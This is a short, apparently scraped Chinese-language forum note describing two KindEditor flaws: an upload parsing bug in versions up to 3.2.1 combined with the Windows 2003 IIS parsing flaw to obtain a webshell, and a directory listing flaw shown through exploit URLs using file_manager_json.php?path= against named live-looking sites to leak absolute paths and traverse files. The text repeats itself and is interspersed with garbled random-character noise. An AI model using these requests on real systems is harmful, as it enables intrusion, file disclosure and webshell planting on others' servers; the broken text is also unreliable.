KindEditor上传解析漏洞 影响版本:= kindeditor 3.2.1(09年8月份发布的最新版) 漏洞利用:利用windows 2003 IIS解析漏洞拿WEBSHELL KindEditor列目录漏洞 测试版本:KindEditor 3.4.2 KindEditor 3.5.5 1.http://www.political-security.com/67cms/kindeditor/php/file_man- v( J* }# m$ Q: i. G' K
, K( l. a+ V \$ H& p KindEditor上传解析漏洞 影响版本:<= kindeditor 3.2.1(09年8月份发布的最新版) 漏洞利用:利用windows 2003 IIS解析漏洞拿WEBSHELL T9 k. J. D% o7 ^) }$ B
A! z6 L. _) f' V- S4 S& p5 _+ _KindEditor列目录漏洞 测试版本:KindEditor 3.4.2 KindEditor 3.5.5 - http://www.political-security.com/67cms/kindeditor/php/file_manager_json.php?path=/
- //path=/,爆出绝对路径D:AppServwww67cmskindeditorphpfile_manager_json.php
- 2.http://netknight.in/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/
- //根据爆出的绝对路径,修改path的值为AppServ/www/67cms/
- 这时将遍历d:/AppServ/www/67cms/下的所有文件和文件名( j, M H, b6 @$ I( ^0 H- f
9 V) E; T( T8 e6 c$ P8 L+ Q1 K
* o r2 W1 I$ M
- S% l8 G, N. |# o1 B$ _- E( P& ~. P. U2 u! C- n8 ^5 Z& o
) H+ |. Y, {9 ?2 l
|